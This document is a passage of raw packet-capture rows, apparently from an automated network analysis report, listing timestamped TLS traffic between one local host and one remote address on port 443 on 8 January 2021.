                                                        Jan 8, 2021 09:08:29.915539026 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.916059971 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.916101933 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.916191101 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.916734934 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.916779041 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.916851044 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.917426109 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.917467117 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.917547941 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.918020964 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.918054104 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.918122053 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.918417931 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.918461084 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.918529987 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.919120073 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.919158936 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.919250965 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.919729948 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.919770002 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.919846058 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.920389891 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.920432091 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.920514107 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.921047926 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.921097994 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.921174049 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.921761990 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.921807051 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.921880007 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.922373056 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.922415972 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.922482967 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.923057079 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.923099041 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.923163891 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.923732996 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.923774958 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.923854113 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.924488068 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.924531937 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.924598932 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.925009966 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.925050020 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.925112009 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.925687075 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.925728083 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.925786972 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.926368952 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.072148085 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.072207928 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.072247982 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.072297096 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.072446108 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.072946072 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.072989941 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.073215961 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.073575974 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.073617935 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.073703051 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.074234009 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.074276924 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.074400902 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.074892998 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.074935913 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.075012922 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.075540066 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.075578928 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.075681925 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.076190948 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.076231956 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.076293945 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.076847076 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.076896906 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.076975107 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.077517986 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.077562094 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.077666998 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.078186035 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.078229904 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.078295946 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.078815937 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.078857899 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.078922033 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.079472065 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.079514980 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.079586983 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.080130100 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.080168962 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.080233097 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.080787897 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.080828905 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.080895901 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.081466913 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.081509113 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.081576109 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.082087040 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.082138062 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.082220078 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.082762003 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.082849979 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.082930088 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.083473921 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.083512068 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.083656073 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.084101915 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.084151983 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.084294081 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.084722996 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.084767103 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.084830999 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.085407019 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.085458040 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.085532904 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.086267948 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.086317062 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.086386919 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.086689949 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.086735010 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.086807013 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.087359905 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.087403059 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.087534904 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.088043928 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.088085890 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.088157892 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.088669062 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.088711977 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.088783026 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.089323044 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.089366913 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.089452982 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.089984894 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.090029001 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.090094090 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.090630054 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.090671062 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.090744019 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.091306925 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.091351986 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.091429949 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.091988087 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.092026949 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.092113018 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.092603922 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.092644930 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.093018055 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.093280077 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.093322992 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.093465090 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.093916893 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.093966961 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.094037056 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.094605923 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.094657898 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.094729900 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.095237017 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.095273018 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.095354080 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.252331018 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.252397060 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.252487898 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.252537012 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.252569914 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.252609015 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.253253937 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.253298044 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.253375053 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.253818035 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.253858089 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.253930092 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.254467010 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.254508972 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.254575014 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.255140066 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.255186081 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.255259991 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.255745888 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.258327961 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.258369923 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.258438110 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.258634090 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.258685112 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.258718014 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.259346008 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.259388924 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.259455919 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.260013103 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.260056973 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.260121107 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.260637999 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.260680914 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.260746002 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.261315107 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.261359930 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.261482954 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.261943102 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.261985064 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.262073994 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.262574911 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.262617111 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.262681007 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.263302088 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.263345957 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.263415098 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.263926983 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.263964891 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.264024019 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.264555931 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.264596939 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.264669895 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.265207052 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.265248060 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.265310049 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.265871048 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.265912056 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.265981913 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.266529083 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.266566992 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.266654015 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.267245054 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.267294884 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.267450094 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.267857075 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.267899990 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.267959118 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.268523932 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.268567085 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.268682003 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.269170046 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.269212008 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.269340038 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.269834042 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.269876957 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.269947052 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.270500898 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.270545006 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.270617962 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.271220922 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.271260977 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.271321058 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.271960974 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.272001982 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.272072077 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.272449017 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.272490025 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.272587061 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.273154020 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.273205042 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.273268938 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.273797989 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.273845911 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.273905993 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.274451971 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.274494886 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.274569988 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.275103092 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.275146008 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.275360107 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.275742054 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.275793076 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.275876999 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.276420116 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.276460886 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.276537895 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.277060032 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.277103901 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.277257919 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.277749062 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.277790070 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.277878046 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.278386116 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.278428078 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.278502941 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.279045105 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.279088020 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.279238939 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.279687881 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.279726982 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.279794931 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.280330896 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.280375004 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.280457020 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.281009912 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.281059980 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.281198978 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.281666994 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.281702042 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.281778097 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.294862032 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.451102972 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.451165915 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.451205969 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.451282024 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.451294899 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.451335907 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.451354027 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.451399088 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.451450109 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.452142954 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.452186108 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.452217102 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.452279091 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.453077078 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.453121901 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.453140974 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.453164101 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.453212976 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.454014063 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.454183102 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.454226017 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.454240084 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.454266071 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.454309940 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.454958916 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.455009937 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.455050945 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.455065966 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.455929995 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.455972910 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.456001997 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.456095934 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.456839085 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.456881046 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.456918955 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.456938028 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.457715988 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.457766056 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.457792044 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.457811117 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.457870960 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.458642006 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.458682060 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.458720922 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.458739996 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.459839106 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.459880114 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.459908009 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.459918022 CET44349177104.18.58.219192.168.2.22
